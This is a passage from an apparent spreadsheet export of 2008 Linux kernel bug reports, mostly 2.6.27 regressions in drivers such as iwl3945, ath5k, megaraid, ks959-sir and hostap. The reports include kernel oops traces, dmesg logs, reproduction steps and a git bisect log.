161.968013] [&lt;c0356b3d&gt;] ? inetdev_event+0xfd/0x240 [ 161.968013] [&lt;f8dfe3ee&gt;] ? packet_notifier+0x1e/0x1b0 [af_packet] [ 161.968013] [&lt;c03970b5&gt;] ? notifier_call_chain+0x35/0x70 [ 161.968013] [&lt;c014c0bf&gt;] ? raw_notifier_call_chain+0x1f/0x30 [ 161.968013] [&lt;c0308ec6&gt;] ? dev_change_name+0x146/0x1d0 [ 161.968013] [&lt;c017fa5e&gt;] ? ftrace_record_ip+0xee/0x1f0 [ 161.968013] [&lt;c030a797&gt;] ? dev_ifsioc+0x267/0x300 [ 161.968013] [&lt;c03934fc&gt;] ? mutex_lock+0x1c/0x20 [ 161.968013] [&lt;c030acb1&gt;] ? dev_ioctl+0x481/0x520 [ 161.968013] [&lt;c03946ed&gt;] ? _spin_lock+0xd/0x10 [ 161.968013] [&lt;c01e3525&gt;] ? inotify_d_instantiate+0x45/0x60 [ 161.968013] [&lt;c0215378&gt;] ? security_d_instantiate+0x18/0x30 [ 161.968013] [&lt;c01c72a7&gt;] ? d_instantiate+0x57/0x60 [ 161.968013] [&lt;c02fb1d4&gt;] ? sock_ioctl+0x84/0x250 [ 161.968013] [&lt;c02fb150&gt;] ? sock_ioctl+0x0/0x250 [ 161.968013] [&lt;c01c048d&gt;] ? vfs_ioctl+0x2d/0x90 [ 161.968013] [&lt;c01c0676&gt;] ? do_vfs_ioctl+0x66/0x1f0 [ 161.968013] [&lt;c01b14de&gt;] ? filp_close+0x4e/0x80 [ 161.968013] [&lt;c01c086b&gt;] ? sys_ioctl+0x6b/0x70 [ 161.968013] [&lt;c0103f6b&gt;] ? sysenter_do_call+0x12/0x2f [ 161.968013] [&lt;c0390000&gt;] ? native_cpu_up+0x56/0x180 [ 161.968013] ======================= [ 161.968013] Code: 07 00 00 8b 42 18 89 34 24 89 c1 e8 a3 9c 2f c7 85 c0 75 a3 89 74 24 04 c7 04 24 14 8b f1 f8 e8 78 5b 48 c7 eb 91 90 8d 74 26 00 &lt;0f&gt; 0b eb fe 8d 74 26 00 55 89 e5 83 ec 04 90 8d 74 26 00 b8 20 [ 161.968013] EIP: [&lt;f8f0c938&gt;] netdev_notify+0x88/0x90 [mac80211] SS:ESP 0068:f3ca3e08 [ 161.979850] ---[ end trace bc190790f56df6e5 ]--- Steps to reproduce: On my system it always crashes when the iwl3945 is loaded.</t>
  </si>
  <si>
    <t>Ath5k driver has too many interrupts per second at idle</t>
  </si>
  <si>
    <t>2008-10-12 20:26 UTC</t>
  </si>
  <si>
    <t>2008-12-01 15:07 UTC</t>
  </si>
  <si>
    <t>Luis R. Rodriguez</t>
  </si>
  <si>
    <t>Latest working kernel version: None Earliest failing kernel version: Unknow Distribution: all Hardware Environment: Atheros wireless chipset Software Environment: Fedora Problem Description: ath5k driver has many inperrupts per second although the system is idle. I used AspierOne to test it, interrupts are so many that CPU's C3 residence time is only 20 milliseconds or less, there isn't any valid traffic on my wireless network except beacon frame. I tested X61 in the same wireless environment, number of interrupt is only 1 per second, X61 has the latest Intel wireless chipset and 2.6.27 kernel was running. So i think ath5k and ath9k should can do as Intel wireless driver does, otherwise, CPU can't stay at C3 with longer time because of wireless interrupts. Steps to reproduce: 1. Enable wireless on platform with Atheros wireless chipset. 2. watch cat /proc/interrupts</t>
  </si>
  <si>
    <t>[thinkpad-acpi] for t43 should be set brightness_mode=1</t>
  </si>
  <si>
    <t>2.6.12 and all later kernels</t>
  </si>
  <si>
    <t>2008-10-13 03:53 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution:ubuntu 8.10 Hardware Environment:thinkpad t43 Software Environment: Problem Description: By default thinkpad-acpi use brightness_mode=3 (EC &amp; NVRAM) for all thinkpads. But this not working correctly with thinkpad t43, brightness is controlled by hotkeys but not by userspace tools. instead brightness_mode=1 (EC only) should be set to work properly. So after this brightness can be controled bay hotkeys and userspace tools.</t>
  </si>
  <si>
    <t>Incorrect file remove from ext4</t>
  </si>
  <si>
    <t>2008-10-13 17:37 UTC</t>
  </si>
  <si>
    <t>Ravadics Csaba</t>
  </si>
  <si>
    <t>2008-11-10 02:49 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26.5 Earliest failing kernel version: 2.6.27 Distribution: Fedora 9 Hardware Environment: AMD Phenom(tm) 9550 Quad-Core Processor, 2 GiB RAM, MSI K9A2 CF motherboard, WDC WD5000AAKS-0 HDD Software Environment: mc-4.6.2-3.pre1.fc9.x86_64, bash-3.2-22.fc9.x86_64 Problem Description: mc don't remove recursively from ext4dev Steps to reproduce: 1) Login root 2) Start mc 3) Decompress kernel source (for example: linux-2.6.26.6) to ext4 (for example target dir: /root or /usr/src) 4) Change dir 5) Select linux-2.6.26.6 6) Press F8 (delete) key 7) Delete directory "linux-2.6.26.6"? Yes 8) Directory not empty. Delete it recursively? All 9) echo linux* linux-2.6.26.6 Directory not removed. kernel version fs status --------------- --------- -------- 2.6.26.5 ext3 OK 2.6.26.5 ext4dev OK 2.6.27 ext3 OK 2.6.27 ext4dev FAILED</t>
  </si>
  <si>
    <t>Nokia 6300 storage-mode</t>
  </si>
  <si>
    <t>2008-10-15 10:42 UTC</t>
  </si>
  <si>
    <t>Maciej Gierok</t>
  </si>
  <si>
    <t>2009-01-30 12:24 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26 Earliest failing kernel version: 2.6.27 Distribution: Gentoo Hardware Environment: USB(ohci,ehci) Software Environment: gcc-4.3.2, glibc-2.8_p20080602-r0 Problem Description: When I plug in my Nokia 6300 and chose storage mode nothing happend. dmesg said: usb 2-4: configuration #1 chosen from 1 choice scsi6 : SCSI emulation for USB Mass Storage devices usb-storage: device found at 10 usb-storage: waiting for device to settle before scanning scsi 6:0:0:0: Direct-Access Nokia Nokia 6300 0000 PQ: 0 ANSI: 4 sd 6:0:0:0: [sdc] 248321 512-byte hardware sectors (127 MB) sd 6:0:0:0: [sdc] Write Protect is off sd 6:0:0:0: [sdc] Mode Sense: 03 00 00 00 sd 6:0:0:0: [sdc] Assuming drive cache: write through sd 6:0:0:0: [sdc] 248321 512-byte hardware sectors (127 MB) sd 6:0:0:0: [sdc] Write Protect is off sd 6:0:0:0: [sdc] Mode Sense: 03 00 00 00 sd 6:0:0:0: [sdc] Assuming drive cache: write through sdc: sd 6:0:0:0: [sdc] Attached SCSI removable disk sd 6:0:0:0: Attached scsi generic sg4 type 0 usb-storage: device scan complete sd 6:0:0:0: [sdc] Sense Key : 0x0 [current] sd 6:0:0:0: [sdc] ASC=0x0 ASCQ=0x0 sd 6:0:0:0: [sdc] Sense Key : 0x0 [current] sd 6:0:0:0: [sdc] ASC=0x0 ASCQ=0x0 sd 6:0:0:0: [sdc] Sense Key : 0x0 [current] sd 6:0:0:0: [sdc] ASC=0x0 ASCQ=0x0 and: sd 6:0:0:0: [sdc] Sense Key : 0x0 [current] sd 6:0:0:0: [sdc] ASC=0x0 ASCQ=0x0 are repeat in never ending loop. On kernel 2.6.26 it worked OK. I assumed that it may associate whit fix "USB: Fix the Nokia 6300 storage-mode" that I found in kernel 2.6.27-rc8. Steps to reproduce: always</t>
  </si>
  <si>
    <t>gpio_to_irq() support is missing in S3C24xx</t>
  </si>
  <si>
    <t>2008-10-16 05:34 UTC</t>
  </si>
  <si>
    <t>Yauhen Kharuzhy</t>
  </si>
  <si>
    <t>2012-05-14 16:48 UTC</t>
  </si>
  <si>
    <t>When mach S3C2410 is selected then driver drivers/input/keyboard/gpio_keys.c does not compile with error drivers/input/keyboard/gpio_keys.c: In function ‘gpio_keys_isr’: drivers/input/keyboard/gpio_keys.c:66: error: implicit declaration of function ‘gpio_to_irq’</t>
  </si>
  <si>
    <t>constant PANIC and immediate "early exception" on boot with new 2.6.27</t>
  </si>
  <si>
    <t>2008-10-18 04:50 UTC</t>
  </si>
  <si>
    <t>Rodney Gordon II</t>
  </si>
  <si>
    <t>2008-10-18 19:53 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26 Earliest failing kernel version: 2.6.27 Distribution: vanilla 2.6.27 final, Ubuntu Intrepid Beta 2.6.27-rc, and RIPLinux 6.9 2.6.27 final Hardware Environment: Asus P5QL-PRO, Intel Q6600, 4GB RAM (memtest'ed), GeForce 8800GT 512M Software Environment: n/a Problem Description: Recently with the release of 2.6.27 I have tried this on my main machine and I have been getting a pretty regular early exception on my hardware. I will include as much information as I have collected. Panic: Kernel alive Kernel really alive PANIC: early exception 0e rip 10:ffffffff8072f305 error 0 cr2 ffffffffff341000 Working boot dmesg: http://spherevision.org/sync/kernel/ubuntu-8.04-working-dmesg.log lspci http://spherevision.org/sync/kernel/lspci-vvnn.log I am available for details/testing/etc for whatever it takes to clean this error up and get it to boot on my hardware. Similar page off launchpad.net of error on boot of Intrepid Beta on some with similar outputs of early exceptions: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/54020 Steps to reproduce: Build kernel 2.6.27 Boot</t>
  </si>
  <si>
    <t>p54 misbehaves when firmware can't be found</t>
  </si>
  <si>
    <t>2.6.27-git8</t>
  </si>
  <si>
    <t>2008-10-18 09:12 UTC</t>
  </si>
  <si>
    <t>2008-11-12 08:26 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26 Earliest failing kernel version: ? Distribution: Ubuntu 8.04 Hardware Environment: AMD Elan (TS-5500) Software Environment: Problem Description: When firmware can't be found free_irq complains. Steps to reproduce: Ensure the firmware is not available in /lib/firmware/$(uname -r)/ p54pci 0000:01:00.0: enabling device (0000 -&gt; 0002) p54pci 0000:01:00.0: setting latency timer to 64 p54pci 0000:01:00.0: firmware: requesting isl3886 0000:01:00.0 (p54pci): cannot find firmware (isl3886) phy0: device does not respond! Trying to free already-free IRQ 10 Pid: 108, comm: pccardd Not tainted 2.6.27-05577-g0cfd810-dirty #1 Call Trace: [&lt;c01265dc&gt;] free_irq+0xad/0xb9 [&lt;c01050dd&gt;] dma_generic_alloc_coherent+0x0/0xd7 [&lt;c01ba8e6&gt;] p54p_stop+0x4a/0x1fa [&lt;c01050dd&gt;] dma_generic_alloc_coherent+0x0/0xd7 [&lt;c02348c5&gt;] p54p_probe+0x23e/0x302 [&lt;c0192dd3&gt;] kobject_get+0xf/0x13 [&lt;c019cd9f&gt;] pci_device_probe+0x36/0x55 [&lt;c01adf86&gt;] driver_probe_device+0x9c/0x112 [&lt;c01ad5f2&gt;] bus_for_each_drv+0x34/0x5b [&lt;c01ae0d1&gt;] device_attach+0x4e/0x61 [&lt;c01ae063&gt;] __device_attach+0x0/0x5 [&lt;c01ad4bc&gt;] bus_attach_device+0x1e/0x46 [&lt;c01ac8c8&gt;] device_add+0x2c8/0x3ef [&lt;c0199cd9&gt;] pci_bus_write_config_byte+0x16/0x1e [&lt;c0199e24&gt;] pci_bus_add_device+0xc/0x2c [&lt;c0199e62&gt;] pci_bus_add_devices+0x1e/0x134 [&lt;c0232e4a&gt;] cb_alloc+0x92/0xa4 [&lt;c01ccee7&gt;] socket_insert+0x80/0xa5 [&lt;c01cd347&gt;] pccardd+0x13c/0x1b5 [&lt;c01cd20b&gt;] pccardd+0x0/0x1b5 [&lt;c011bc3b&gt;] kthread+0x36/0x5b [&lt;c011bc05&gt;] kthread+0x0/0x5b [&lt;c0102dc7&gt;] kernel_thread_helper+0x7/0x10 p54pci: probe of 0000:01:00.0 failed with error -16</t>
  </si>
  <si>
    <t>Oops when reading /proc/megaraid/hba0/diskdrives-ch*</t>
  </si>
  <si>
    <t>2008-10-19 16:27 UTC</t>
  </si>
  <si>
    <t>2012-05-22 15:00 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24 Earliest failing kernel version: 2.6.27-rc8 Distribution: Mandriva Problem Description: Oops when reading /proc/megaraid/hba0/diskdrives-ch* BUG: unable to handle kernel NULL pointer dereference at 00000000 IP: [&lt;f88729b4&gt;] :megaraid:mega_internal_command+0x74/0x130 *pdpt = 0000000032c80001 *pde = 0000000000000000 Oops: 0002 [#1] SMP Modules linked in: nfsd auth_rpcgss exportfs ohci1394 ieee1394 nfs lockd nfs_acl sunrpc af_packet binfmt_misc loop ext3 jbd dm_mod rtc_cmos eepro100 shpchp pci_hotplug ipmi_msghandler e100 ide_cd_mod mii i2c_core sg sworks_agp agpgart serverworks ide_core i2o_core megaraid sd_mod scsi_mod crc_t10dif xfs uhci_hcd ohci_hcd ehci_hcd usbcore [last unloaded: scsi_wait_scan] Pid: 2319, comm: diff Not tainted (2.6.27-server-0.rc8.2mnb #1) EIP: 0060:[&lt;f88729b4&gt;] EFLAGS: 00010246 CPU: 0 EIP is at mega_internal_command+0x74/0x130 [megaraid] EAX: 00000000 EBX: f7942364 ECX: 00000000 EDX: f2d96000 ESI: f7942850 EDI: f7942860 EBP: f24e1df4 ESP: f24e1dc0 DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 Process diff (pid: 2319, ti=f24e0000 task=f39f5710 task.ti=f24e0000) Stack: 3691e000 00000000 f24e1e1c c010e4c8 f24e1e0c 00000000 f24e1dfe f79429b4 f79428e8 f2d96000 f7942364 f24e1dfe f24e1e10 f24e1e1c f8872b51 00040000 00000000 e0000000 00003691 00000000 f8873f00 f7930c08 c2a56c08 f24e1f08 Call Trace: [&lt;c010e4c8&gt;] ? dma_alloc_coherent+0x108/0x2c0 [&lt;f8872b51&gt;] ? mega_adapinq+0x41/0x60 [megaraid] [&lt;f8873f00&gt;] ? proc_pdrv_ch0+0x0/0x20 [megaraid] [&lt;f8873887&gt;] ? proc_pdrv+0xb7/0x6d0 [megaraid] [&lt;c01845fe&gt;] ? __alloc_pages_internal+0xae/0x460 [&lt;c01b6d29&gt;] ? do_filp_open+0x1c9/0x7c0 [&lt;f8873f00&gt;] ? proc_pdrv_ch0+0x0/0x20 [megaraid] [&lt;f8873f18&gt;] ? proc_pdrv_ch0+0x18/0x20 [megaraid] [&lt;c01ed6ab&gt;] ? proc_file_read+0x17b/0x260 [&lt;c01ed530&gt;] ? proc_file_read+0x0/0x260 [&lt;c01e8c9e&gt;] ? proc_reg_read+0x5e/0x90 [&lt;c01ab959&gt;] ? vfs_read+0x99/0x160 [&lt;c01e8c40&gt;] ? proc_reg_read+0x0/0x90 [&lt;c01abadd&gt;] ? sys_read+0x3d/0x70 [&lt;c0109e03&gt;] ? sysenter_do_call+0x12/0x2f [&lt;c0390000&gt;] ? native_cpu_up+0xf0/0x743 ======================= Code: 98 4c c0 e8 ff 39 93 c7 8d bb fc 04 00 00 89 45 f0 8b 55 f0 89 83 84 05 00 00 8b 43 48 89 02 8b 83 b8 05 00 00 89 b3 44 06 00 00 &lt;c6&gt; 00 e1 8b 45 ec 83 8b f0 04 00 00 01 8b 75 e4 89 83 48 05 00 EIP: [&lt;f88729b4&gt;] mega_internal_command+0x74/0x130 [megaraid] SS:ESP 0068:f24e1dc0 ---[ end trace 18d8357732584241 ]---</t>
  </si>
  <si>
    <t>ks959-sir dongle no longer works under 2.6.27 (REGRESSION)</t>
  </si>
  <si>
    <t>2008-10-20 10:49 UTC</t>
  </si>
  <si>
    <t>2009-03-10 00:46 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26, 2.6.26.5 Earliest failing kernel version: 2.6.27-rc1 Distribution: Fedora 8 Linux karlalex.palosanto.com 2.6.26-bisect-4-05350-g519f014 #4 PREEMPT Mon Oct 20 00:33:58 ECT 2008 i686 i686 i386 GNU/Linux Gnu C 4.1.2 Gnu make 3.81 binutils 2.17.50.0.18 util-linux 2.13.1 mount 2.13.1 module-init-tools 3.4 e2fsprogs 1.40.4 pcmciautils 014 quota-tools 3.14. PPP 2.4.4 Linux C Library 2.7 Dynamic linker (ldd) 2.7 Procps 3.2.7 Net-tools 1.60 Kbd 1.12 oprofile 0.9.3 Sh-utils 6.9 udev 118 wireless-tools 29 Modules Loaded usb_storage irnet ppp_generic slhc irtty_sir sir_dev ircomm_tty ircomm ks959_sir eeprom ipv6 bridge stp rfcomm bnep l2cap bluetooth it87 hwmon_vid fuse vfat fat dm_mirror dm_log dm_multipath scsi_dh dm_mod snd_seq_dummy snd_via82xx_modem snd_seq_oss snd_seq_midi_event snd_seq snd_pcm_oss snd_via82xx snd_ac97_codec snd_mixer_oss snd_mpu401 ac97_bus snd_mpu401_uart snd_rawmidi parport_pc snd_pcm rtc_cmos rtc_core parport pcspkr ns558 rtc_lib snd_timer via_ircc snd_seq_device gameport snd irda soundcore via_rhine snd_page_alloc floppy mii crc_ccitt i2c_viapro i2c_core button via_agp agpgart sr_mod sg cdrom ata_generic pata_via libata sd_mod scsi_mod ext3 jbd mbcache uhci_hcd ohci_hcd ehci_hcd Problem Description: The Kingsun KS-959 USB IrDA dongle support (ks959-sir) is broken in 2.6.27 - obexftp and similar programs can no longer connect to remote targets with this dongle. This is a regression: 2.6.26.5 works correctly with this very same dongle. This bug exists since at least 2.6.27-rc1. Steps to reproduce: Get KS-959 USB IrDA dongle and remote IrDA target (Sony Ericsson K300 used for tests) Connect dongle to any USB port Attempt to use obexftp to connect and list contents. Actual results: program times out attempting to connect. In addition, the following appears on the kernel log: [ 101.404383] usb 2-2: new low speed USB device using uhci_hcd and address 2 [ 101.584601] usb 2-2: configuration #1 chosen from 1 choice [ 101.734805] KingSun KS-959 IRDA/USB found at address 2, Vendor: 7d0, Product: 4959 [ 101.739778] ks959_sir: IrDA: Registered KingSun KS-959 device irda0 [ 101.741421] usbcore: registered new interface driver ks959-sir [ 102.020925] IrCOMM protocol (Dag Brattli) [ 102.292940] PPP generic driver version 2.4.2 [ 102.899711] irlap_change_speed(), setting speed to 9600 [ 120.425255] irlap_change_speed(), setting speed to 57600 [ 123.173934] IrLAP, no activity on link! [ 125.310542] irlmp_state_setup() WATCHDOG_TIMEOUT! [ 125.310606] irda_connect(), connect failed! [ 126.173864] IrLAP, no activity on link! [ 129.173805] IrLAP, no activity on link! [ 130.310478] irlmp_state_setup() WATCHDOG_TIMEOUT! [ 130.310543] irda_connect(), connect failed! [ 132.173742] IrLAP, no activity on link! [ 132.673731] irlap_change_speed(), setting speed to 9600 [ 132.673846] irda_connect(), connect failed! Expected results: program connects immediately, executes requested action. One workaround is to execute the following command before using any program to connect via the dongle: echo 9600 &gt; /proc/sys/net/irda/max_baud_rate This allows the program to connect, but forces a lower transfer speed. Analysis so far: From what I have seen in the usbmon logs (attached), the bug is that the IrDA subsystem somehow forgets to flag a new speed change properly to the ks959-sir driver. In the 2.6.26.5 log, the control requests that switch the dongle speeds can be recognized as request-type 0x21, request 0x09, value 0x0200: ddb8b900 4231738535 S Co:2:003:0 s 21 09 0200 0001 0008 8 = 80250000 03000000 &lt;--- switches to 9600 bps ... ddb8b900 4237269710 S Co:2:003:0 s 21 09 0200 0001 0008 8 = 00e10000 03000000 &lt;--- switches to 57600 bps The new speed is also encoded in the transmitted IrDA packet, so that the remote side knows about the speed change. The control request to change speed to 57600 bps is absent in the 2.6.27 usbmon log, but the wrapped packet still encodes the speed change, so the remote side changes speed but the dongle remains at 9600 bps, and they get out of sync. This is consistent with the workaround that keeps the maximum speed at 9600 bps. I am doing a bisect right now, but my working theory is that irda_get_next_speed() is returning -1 instead of the actual next speed to program. Since the function includes a check for LAP_MAGIC, it is possible that a recent commit broke the LAP_MAGIC check. While filing this bug, I have noticed that my working theory is correct. Recent changes have broken the LAP_MAGIC check by 2.6.27-rc1. This is supported by tests performed by Vasily Khoruzhick, who gave alert of this bug at irda-users. Incomplete git bisection follows: [alex@karlalex linux-2.6-git]$ git-bisect log git-bisect start # good: [bce7f793daec3e65ec5c5705d2457b81fe7b5725] Linux 2.6.26 git-bisect good bce7f793daec3e65ec5c5705d2457b81fe7b5725 # bad: [6e86841d05f371b5b9b86ce76c02aaee83352298] Linux 2.6.27-rc1 git-bisect bad 6e86841d05f371b5b9b86ce76c02aaee83352298 # good: [d20b27478d6ccf7c4c8de4f09db2bdbaec82a6c0] V4L/DVB (8415): gspca: # Infinite loop in i2c_w() of etoms. git-bisect good d20b27478d6ccf7c4c8de4f09db2bdbaec82a6c0 # bad: [53baaaa9682c230410a057263d1ce2922f43ddc4] Merge # git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/driver-core-2.6 git-bisect bad 53baaaa9682c230410a057263d1ce2922f43ddc4 # good: [925068dcdc746236264d1877d3d5df656e87882a] Merge branch 'davem-next' # of master.kernel.org:/pub/scm/linux/kernel/git/jgarzik/netdev-2.6 git-bisect good 925068dcdc746236264d1877d3d5df656e87882a # bad: [519f0141f1c42e2b8b59c7dea005cbf6095358e8] Merge branch 'for-linus' of # git://git.kernel.org/pub/scm/linux/kernel/git/dtor/input git-bisect bad 519f0141f1c42e2b8b59c7dea005cbf6095358e8</t>
  </si>
  <si>
    <t>[Radeon Xpress 1100 IGP] DRI fail on recent kernel updates</t>
  </si>
  <si>
    <t>2.6.27-git9</t>
  </si>
  <si>
    <t>2008-10-21 04:28 UTC</t>
  </si>
  <si>
    <t>2008-11-06 21:00 UTC</t>
  </si>
  <si>
    <t>I'm using the xf86-video-ati-6.9.0 driver(not fglrx ones;) and it work fine at least in the 2.6.27-rc* kernel. Under the 2.6.27-git9 kernel, if I enable the DRI in xorg.conf, it will give me totally black screen. Even Ctrl+Alt+F1 doesn't work. It seems that the screen was totally turned off. I will provide dmesg and X.0.log soon.</t>
  </si>
  <si>
    <t>xorg can not start up with stolen memory</t>
  </si>
  <si>
    <t>2008-10-21 06:08 UTC</t>
  </si>
  <si>
    <t>arrow zhang</t>
  </si>
  <si>
    <t>2008-11-16 03:47 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27 (yesterday) Earliest failing kernel version: 2.6.27 Distribution: archlinux Software version: Xorg -version X.Org X Server 1.4.2 Release Date: 11 June 2008 X Protocol Version 11, Revision 0 Build Operating System: Linux 2.6.26-ARCH i686 Hardware Environment: thinkpad x200 Problem Description: xorg can not start up with stolen memory Steps to reproduce: - mainline kernel with commit: 0cfd81031a26717fe14380d18275f8e217571615 - press "startx" after system boot up with init level 3 ----8&lt;----(dmesg) [ 0.000000] BIOS EBDA/lowmem at: 0009ec00/0009ec00 [ 0.000000] Initializing cgroup subsys cpuset [ 0.000000] Initializing cgroup subsys cpu [ 0.000000] Linux version 2.6.27 (arrow@think) (gcc version 4.3.2 (GCC) ) #20 SMP Tue Oct 21 19:57:36 CST 2008 [ 0.000000] KERNEL supported cpus: [ 0.000000] Intel GenuineIntel [ 0.000000] AMD AuthenticAMD [ 0.000000] NSC Geode by NSC [ 0.000000] Cyrix CyrixInstead [ 0.000000] Centaur CentaurHauls [ 0.000000] Transmeta GenuineTMx86 [ 0.000000] Transmeta TransmetaCPU [ 0.000000] UMC UMC UMC UMC [ 0.000000] BIOS-provided physical RAM map: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009ec00 (usable) [ 0.000000] BIOS-e820: 000000000009ec00 - 00000000000a0000 (reserved) [ 0.000000] BIOS-e820: 00000000000dc000 - 0000000000100000 (reserved) [ 0.000000] BIOS-e820: 0000000000100000 - 000000003c4a1000 (usable) [ 0.000000] BIOS-e820: 000000003c4a1000 - 000000003c4a7000 (reserved) [ 0.000000] BIOS-e820: 000000003c4a7000 - 000000003c5b7000 (usable) [ 0.000000] BIOS-e820: 000000003c5b7000 - 000000003c60f000 (reserved) [ 0.000000] BIOS-e820: 000000003c60f000 - 000000003c6c6000 (usable) [ 0.000000] BIOS-e820: 000000003c6c6000 - 000000003c6d1000 (ACPI NVS) [ 0.000000] BIOS-e820: 000000003c6d1000 - 000000003c6d4000 (ACPI data) [ 0.000000] BIOS-e820: 000000003c6d4000 - 000000003c6d8000 (reserved) [ 0.000000] BIOS-e820: 000000003c6d8000 - 000000003c6dc000 (ACPI NVS) [ 0.000000] BIOS-e820: 000000003c6dc000 - 000000003c6df000 (reserved) [ 0.000000] BIOS-e820: 000000003c6df000 - 000000003c706000 (ACPI NVS) [ 0.000000] BIOS-e820: 000000003c706000 - 000000003c708000 (ACPI data) [ 0.000000] BIOS-e820: 000000003c708000 - 000000003c90f000 (reserved) [ 0.000000] BIOS-e820: 000000003c90f000 - 000000003c99f000 (ACPI NVS) [ 0.000000] BIOS-e820: 000000003c99f000 - 000000003c9ff000 (ACPI data) [ 0.000000] BIOS-e820: 000000003c9ff000 - 000000003ca00000 (usable) [ 0.000000] BIOS-e820: 000000003cc00000 - 000000003f000000 (reserved) [ 0.000000] BIOS-e820: 00000000e0000000 - 00000000f0000000 (reserved) [ 0.000000] BIOS-e820: 00000000fec00000 - 00000000fec10000 (reserved) [ 0.000000] BIOS-e820: 00000000fed00000 - 00000000fed00400 (reserved) [ 0.000000] BIOS-e820: 00000000fed10000 - 00000000fed14000 (reserved) [ 0.000000] BIOS-e820: 00000000fed18000 - 00000000fed1a000 (reserved) [ 0.000000] BIOS-e820: 00000000fed1c000 - 00000000fed90000 (reserved) [ 0.000000] BIOS-e820: 00000000fee00000 - 00000000fee01000 (reserved) [ 0.000000] BIOS-e820: 00000000ff800000 - 0000000100000000 (reserved) ... [ 0.040051] CPU0: Intel(R) Core(TM)2 Duo CPU P8400 @ 2.26GHz stepping 06 [ 0.040993] lockdep: fixing up alternatives. [ 0.040993] Booting processor 1/1 ip 6000 [ 0.000999] Initializing CPU#1 [ 0.000999] Calibrating delay using timer specific routine.. 4521.77 BogoMIPS (lpj=2260885) [ 0.000999] CPU: L1 I cache: 32K, L1 D cache: 32K [ 0.000999] CPU: L2 cache: 3072K [ 0.000999] CPU: Physical Processor ID: 0 [ 0.000999] CPU: Processor Core ID: 1 [ 0.111563] CPU1: Intel(R) Core(TM)2 Duo CPU P8400 @ 2.26GHz stepping 06 [ 0.449995] Linux agpgart interface v0.103 [ 0.450178] agpgart-intel 0000:00:00.0: Intel Mobile Intel? GM45 Express Chipset [ 0.451392] agpgart-intel 0000:00:00.0: detected 32764K stolen memory [ 0.454556] agpgart-intel 0000:00:00.0: AGP aperture is 256M @ 0xd0000000 [ 0.454777] [drm] Initialized drm 1.1.0 20060810 [ 0.455035] pci 0000:00:02.0: power state changed by ACPI to D0 [ 0.455117] pci 0000:00:02.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 [ 0.455193] pci 0000:00:02.0: setting latency timer to 64 [ 0.455757] [drm] Initialized i915 1.6.0 20080730 on minor 0 ... [ 47.658979] pci 0000:00:02.0: pg_start == 0x00001f7f, intel_private.gtt_entries == 0x00001fff [ 47.658984] pci 0000:00:02.0: trying to insert into local/stolen memory</t>
  </si>
  <si>
    <t>prism 2.5 broke in 2.6.27</t>
  </si>
  <si>
    <t>2008-10-21 13:26 UTC</t>
  </si>
  <si>
    <t>Yasen Balev</t>
  </si>
  <si>
    <t>2008-12-09 09:34 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26.5 Earliest failing kernel version: 2.6.27 Distribution: Debian Testing, custom compiled generic kernel from kernel.org Hardware Environment: lspci : 02:01.0 Network controller: Intersil Corporation Prism 2.5 Wavelan chipset (rev 01) lspci -n: 02:01.0 0280: 1260:3873 (rev 01) (minipci board scavenged from Fujitsu p2120 notebook over noname "minipci-to-pci") Intel 865 motherboard, P4 @2.8 CPU Software Environment: Problem Description: The wireless board stopped to work as an AP in 2.6.27. Tried 2.6.27.2 - no luck either. What I get in dmesg: [ 14.220924] hostap_pci 0000:02:01.0: PCI INT A -&gt; GSI 21 (level, low) -&gt; IRQ 21 [ 14.221311] hostap_pci: Registered netdevice wifi0 [ 14.222071] wifi0: Original COR value: 0x0 [ 14.421983] prism2_hw_init: initialized in 195 ms [ 14.423725] wifi0: NIC: id=0x8013 v1.0.0 [ 14.424117] wifi0: PRI: id=0x15 v1.1.1 [ 14.428554] wifi0: STA: id=0x1f v1.8.2 [ 14.433237] wifi0: Intersil Prism2.5 PCI: mem=0xec000000, irq=21 [ 14.433587] wifi0: registered netdevice wlan0 .........unrelated drivers outut.......... ...&lt;here we do ifconfig wlan0 192.168.220.254&gt; [ 47.351189] wifi0: invalid skb-&gt;cb magic (0x000000ae, expected 0xf08a36a2) [ 47.602147] wifi0: invalid skb-&gt;cb magic (0x000000ae, expected 0xf08a36a2) [ 47.854121] wifi0: invalid skb-&gt;cb magic (0x000000ae, expected 0xf08a36a2) [ 47.864092] wifi0: invalid skb-&gt;cb magic (0x0000001e, expected 0xf08a36a2) [ 48.054753] wifi0: invalid skb-&gt;cb magic (0x000000a2, expected 0xf08a36a2) [ 48.209136] wifi0: invalid skb-&gt;cb magic (0x000000a2, expected 0xf08a36a2) [ 48.460146] wifi0: invalid skb-&gt;cb magic (0x000000a2, expected 0xf08a36a2) [ 48.720131] wifi0: invalid skb-&gt;cb magic (0x000000a2, expected 0xf08a36a2) [ 48.911234] wifi0: invalid skb-&gt;cb magic (0x000000df, expected 0xf08a36a2) [ 49.158184] wifi0: invalid skb-&gt;cb magic (0x00000092, expected 0xf08a36a2) ...and so on Stations see the network, but cannot associate. Steps to reproduce: 1. have this in /etc/network/interfaces : auto wlan0 iface wlan0 inet static address 192.168.220.254 netmask 255.255.255.0 wireless-mode master wireless-essid ea0 wireless-channel 4 2. boot 2.6.27.* ==&gt; not working AP 2a. boot 2.6.26.* ==&gt; working AP</t>
  </si>
  <si>
    <t>iscsi: LRO plus iSCSI causes panic</t>
  </si>
  <si>
    <t>2008-10-21 17:17 UTC</t>
  </si>
  <si>
    <t>2009-02-02 13:44 UTC</t>
  </si>
  <si>
